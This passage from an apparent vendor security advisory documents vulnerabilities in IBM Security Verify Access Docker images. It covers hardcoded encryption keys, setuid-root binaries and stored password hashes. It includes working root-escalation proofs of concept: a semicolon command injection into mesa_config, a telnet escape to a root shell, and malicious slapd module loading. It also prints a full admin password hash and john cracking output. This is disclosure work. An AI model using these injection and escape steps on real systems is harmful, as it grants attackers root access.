        d8:4c:44:bf
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675
kali-docker# openssl rsa -in ca.key -modulus -noout       
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675

kali-docker# openssl x509 -in encKey.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey
        Validity
            Not Before: Mar 21 04:56:59 2019 GMT
            Not After : Mar 19 04:56:59 2029 GMT
        Subject: C=US, O=IBM, OU=GSKIT, CN=encKey
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:
                    47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:
                    79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:
                    15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:
                    59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:
                    50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:
                    3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:
                    f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:
                    49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:
                    e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:
                    e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:
                    8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:
                    d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:
                    37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:
                    75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:
                    a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:
                    6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:
                    b1:2d
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: 
                DN.T+L. Z..$.....6B..j.h[i.b-"e>.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....&bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.<..P.<...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=
    Signature Algorithm: sha1WithRSAEncryption
    Signature Value:
        bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:
        75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:
        e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:
        f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:
        07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:
        a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:
        c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:
        12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:
        49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:
        25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:
        ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:
        18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:
        39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:
        51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:
        2d:65:cb:13
Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker# openssl rsa -in encKey.key -modulus -noout

Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker#

It is also possible to decrypt the shadow.enc file of a live instance using the hardcoded device_key.kdb:

kali-docker# file shadow.enc                                                                                             
shadow.enc: data
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64  /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc
kali-docker# cat shadow.enc 
root:!!$6$[REDACTED]:19255:0:99999:7:::
bin:*:18367:0:99999:7:::
daemon:*:18367:0:99999:7:::
adm:*:18367:0:99999:7:::
lp:*:18367:0:99999:7:::
sync:*:18367:0:99999:7:::
shutdown:*:18367:0:99999:7:::
halt:*:18367:0:99999:7:::
mail:*:18367:0:99999:7:::
operator:*:18367:0:99999:7:::
games:*:18367:0:99999:7:::
ftp:*:18367:0:99999:7:::
nobody:*:18367:0:99999:7:::
dbus:!!:19115::::::
systemd-coredump:!!:19115::::::
systemd-resolve:!!:19115::::::
tss:!!:19115::::::
postgres:!!:19151::::::
ldap:!!:19151::::::
admin:$6$[REDACTED]:19255:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
isam:!!:19151:1:90:7:::

An attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an openldap.zip file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys.

The encryption mechanism, based on hardcoded keys, is ineffective and provides a false assumption of security.

Details - Local Privilege Escalation using OpenLDAP

It was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability.

The binary slapd, used to run OpenLDAP has incorrect permissions, allowing any user to run slapd as root. An attacker can run slapd as root and specify a malicious configuration file that will run code as root.

Using a static analysis, the file system has been extracted and the usr/sbin/slapd program is root:$group and 4755:

kali-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd
-rwsr-sr-x 1 root user 1916768 Jun  8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd

While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access instance. The owner is root:ivmgr:

[isam@verify-access log]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
[isam@verify-access log]$

By default, slapd allows to load external modules (to execute code). These .la files contain information about shared libraries that will be loaded within slapd.

Content of /etc/openldap/slapd.conf:

# Load dynamic backend modules:
# modulepath    /usr/lib/openldap
# moduleload    back_bdb.la
# moduleload    back_ldap.la
# moduleload    back_ldbm.la
# moduleload    back_passwd.la
# moduleload    back_shell.la
moduleload syncprov.la

It is possible to load malicious modules as root using a specific configuration .la file. This will allow a local attacker to get a Local Privilege Escalation as root. For example, we can find a default file that we can change into a malicious file by updating the libdir option to another directory:

kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la
# syncprov.la - a libtool library file
# Generated by libtool (GNU libtool) 2.4.6
#
# Please DO NOT delete this file!
# It is necessary for linking the library.

# The name that we can dlopen(3). 
dlname='syncprov-2.4.so.2'

# Names of this library. 
library_names='syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so'
[...]
# Files to dlopen/dlpreopen
dlopen=''
dlpreopen=''

# Directory that this library needs to be installed in:
libdir='/usr/lib64/openldap'

Details - Local Privilege Escalation using rpm

The binary npm has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root.

Using a static analysis, with the file system that has been extracted - the usr/bin/rpm program is root:root and 4755:

kali-extraction-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm 
-rwsr-sr-x 1 root root 21336 Apr  5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm

While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access docker image. The file belongs to root:root:

[isam@verify-access /]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
[isam@verify-access /]$ /usr/bin/rpm
RPM version 4.14.3
Copyright (C) 1998-2002 - Red Hat, Inc. 
This program may be freely redistributed under the terms of the GNU GPL

Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]
        [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]
        [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=<package>+] [--excludedocs] [--excludepath=<path>] [--force] [-F|--freshen=<packagefile>+] [-h|--hash]
        [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]
        [--prefix=<dir>] [--relocate=<old>=<new>] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=<packagefile>+] [--reinstall=<packagefile>+] [-D|--define='MACRO EXPR'] [--undefine=MACRO] [-E|--eval='EXPR']
        [--target=CPU-VENDOR-OS] [--macros=<FILE:...>] [--noplugins] [--nodigest] [--nosignature] [--rcfile=<FILE:...>] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]
        [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]
        [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]
[isam@verify-access /]$

An attacker can run rpm as root to add or remove any package in the system, providing a full root access.

Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes

It was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (4755 - suid bit, with root:root or root:ivmgr as ownership) allowing any local user to run these programs as root:

    • /opt/PolicyDirector/bin/pdmgrd
    • /opt/pdweb/bin/webseald
    • /usr/bin/rpm
    • /usr/sbin/slapd
    • /usr/sbin/mesa_config
    • /usr/sbin/mesa_cli
    • /usr/sbin/mesa_control
    • /usr/sbin/mesa_lcd
    • /usr/sbin/mesa_stats

Binaries with the suid bit:

[isam@verify-access]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
[isam@verify-access]$ ls -la /usr/sbin/mesa_lcd
-rwsr-xr-x 1 root root 57240 Jun  8 13:29 /usr/sbin/mesa_lcd
[isam@verify-access]$ ls -la /usr/sbin/mesa_control
-rwsr-xr-x 1 root root 98448 Jun  8 13:29 /usr/sbin/mesa_control
[isam@verify-access]$ ls -la /usr/sbin/mesa_config
-rwsr-sr-x 1 root root 2975680 Jun  8 13:29 /usr/sbin/mesa_config
[isam@verify-access]$ ls -la /usr/sbin/mesa_stats
-rwsr-xr-x 1 root root 11176 Jun  8 13:13 /usr/sbin/mesa_stats
[isam@verify-access]$ ls -la /usr/sbin/mesa_cli
-rwsr-xr-x 1 root root 436160 Jun  8 13:29 /usr/sbin/mesa_cli
[isam@verify-access]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
[isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd
-r-sr-sr-x 1 root ivmgr 32040 Jun  8 13:30 /opt/PolicyDirector/bin/pdmgrd
[isam@verify-access]$ ls -la /opt/pdweb/bin/webseald
-r-sr-s--- 1 root ivmgr 29296 Jun  8 13:30 /opt/pdweb/bin/webseald
[isam@verify-access]$ ls -la /opt/dsc/bin/dscd
-r-sr-s--- 1 ivmgr ivmgr 24264 Jun  8 13:30 /opt/dsc/bin/dscd

Four trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs.

An attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image.

The code of mesa_* programs contains several trivial vulnerabilities due to the use of the MesaSystem function (and its derivatives) found in the libwsmesa.so library. This function is an insecure wrapper to the execv() function using the arguments /bin/sh -c and attacker-controlled values. The use of /bin/sh -c allows command injections.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Local Privilege Escalation using mesa_config - import of a new snapshot

The mesa_config program allows importing a new snapshot. This allows an attacker to get a Local Privilege Escalation as root by importing a new snapshot:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The function MainApplySnapshot will install the new malicious snapshot as root:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Local Privilege Escalation using mesa_config - command injections

Exploiting the fips_zeroize_files option in the mesa_config program will provide a root access.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The following PoC will provide root privileges inside the current instance:

[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ cat /tmp/test.sh 
#!/bin/sh
id > /tmp/id-2

[isam@verify-access /]$ ls -la /tmp/id-2
ls: cannot access '/tmp/id-2': No such file or directory
[isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files "AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh"
[isam@verify-access /]$ ls -la /tmp/id-2
-rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2
[isam@verify-access /]$ cat /tmp/id-2
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$

Details - Local Privilege Escalation using mesa_cli - import of a new snapshot

The main_cli program is also vulnerable to LPE. This tool allows managing the instance from any user:

[isam@verify-access]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> help
Current mode commands:
diagnostics           Work with the IBM Security Verify Access diagnostics. 
extensions            List and remove extensions installed on the appliance. 
fips                  View FIPS 140-2 state and events. 
fixpacks              Work with fix packs. 
isam                  Work with the IBM Security Verify Access settings. 
license               Work with licenses. 
lmi                   Work with the local management interface. 
lmt                   Work with the license metric tool. 
management            Work with management settings. 
pending_changes       Work with the IBM Security Verify Access pending
                      changes. 
snapshots             Work with policy snapshot files. 
support               Work with support information files. 
tools                 Work with network diagnostic tools. 
Global commands:
back                  Return to the previous command mode. 
exit                  Log off from the appliance. 
help                  Display information for using the specified command. 
reload                Reload the container configuration. 
shutdown              End system operation and turn off the power. 
state                 Display the current state of the container. 
top                   Return to the top level. 
verify-access> snapshots
verify-access:snapshots> help
Current mode commands:
apply                 Apply a policy snapshot file to the system. 
create                Create a snapshot of current policy files. 
delete                Delete a policy snapshot file. 
get_comment           View the comment associated with a policy snapshot file. 
list                  List the policy snapshot files. 
set_comment           Replace the comment associated with a policy snapshot
                      file. 
Global commands:
back                  Return to the previous command mode. 
exit                  Log off from the appliance. 
help                  Display information for using the specified command. 
reload                Reload the container configuration. 
shutdown              End system operation and turn off the power. 
state                 Display the current state of the container. 
top                   Return to the top level. 
verify-access:snapshots> exit
[isam@verify-access /]$

The apply command inside the snapshots menu allows an attacker to install a new malicious snapshot as root and get a Local Privilege Escalation.

Details - Local Privilege Escalation using mesa_cli - telnet escape shell

Another LPE was found using the telnet client available within mesa_cli: it is possible to escape the telnet client using the ^] keys and get a shell as root:

[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> tools
verify-access:tools> telnet test-server01.lan 22
Trying 10.0.0.14... 
Connected to test-server01.lan. 
Escape character is '^]'. 
SSH-2.0-OpenSSH_8.0
^]
telnet> !sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
sh-4.4# touch /tmp/pwned-root
sh-4.4# exit
exit
^]
telnet> q
Connection closed. 
verify-access:tools> exit
[isam@verify-access /]$ ls -la /tmp/pwned-root
-rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root
[isam@verify-access /]$

The sub_410330 function will execv() telnet through the MesaSpawn function:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Outdated OpenSSL

It was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022.

At the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable.

Analysis of the libssl.so.1.1.1k files found in the 4 Docker images:

kali-docker# sha256sum **/libssl.so.1.1.1k                                                                                                       
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k

kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1
OPENSSL_1_1_1
OPENSSL_1_1_1a
OpenSSL 1.1.1k  FIPS 25 Mar 2021
libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug

We can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.

The security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818).

The packages patching the vulnerabilities are:

    • openssl-1.1.1k-7.el8_6.x86_64.rpm
    • openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm
    • [...]

With access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:

[root@container-01]# podman ps
CONTAINER ID  IMAGE                                                                        COMMAND               CREATED      STATUS                    PORTS                             NAMES
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                                4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
a2142514d831  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                        4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:9443->9443/tcp            verify-access-runtime
e0c55b6440cf  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                            4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc
[root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c 'rpm -qa|grep -i openssl';echo;done
openssl-1.1.1k-6.el8_5.x86_64
openssl-libs-1.1.1k-6.el8_5.x86_64
apr-util-openssl-1.6.1-6.el8.x86_64

openssl-libs-1.1.1k-6.el8_5.x86_64

openssl-libs-1.1.1k-6.el8_5.x86_64
openssl-1.1.1k-6.el8_5.x86_64

The official Docker images contain known vulnerabilities.

Details - PermitRootLogin set to yes

It was observed that the configuration file /etc/sysconfig/sshd-permitrootlogin will allow the connection from root in the Docker images:

kali-docker# find . | grep sshd-permitrootlogin
./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin
./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"

If a SSH server was installed inside the instances, it would be then possible to login as root.

Details - Lack of password for the cluster user

It was observed that the cluster user in the Docker image verify-access does not have a password defined in the /etc/shadow file:

kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster
cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh

kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster        
cluster::19151:0:99999:7:::

kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow         
admin:admin:19151:0:99999:7:::
cluster:NO PASSWORD:19151:0:99999:7:::

2 password hashes cracked, 0 left

In the live environment, it was confirmed that the user cluster does not have a password in the verify-access instance:

[root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster
cluster::19151:0:99999:7:::

If a SSH server was installed inside the instances, it would be then possible to login as cluster without a password.

A user with a local access can get cluster privileges.

Details - Non-standard way of storing hashes and world-readable files containing hashes

It was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:

    • /etc/shadow.isam
    • /etc/admin.pwd
    • /etc/wga_notifications.conf

Furthermore, the /etc/shadow.isam and /etc/wga_notifications.conf files are world-readable.

When extracting verify-access, we can find the /etc/shadow.isam file:

kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::

When checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:

[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]#

[root@container-01]# podman ps|grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/verify-access/10.0.4.0:20220926.6                         25 hours ago  Up 25 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]# podman exec -it  413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
-rw-r--r-- 1 root root 305 Jun  8 13:43 /etc/shadow.isam
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]#

Furthermore, we can extract passwords from these files. The hash in /etc/shadow.isam seems to be hardcoded (admin):

[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::

[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
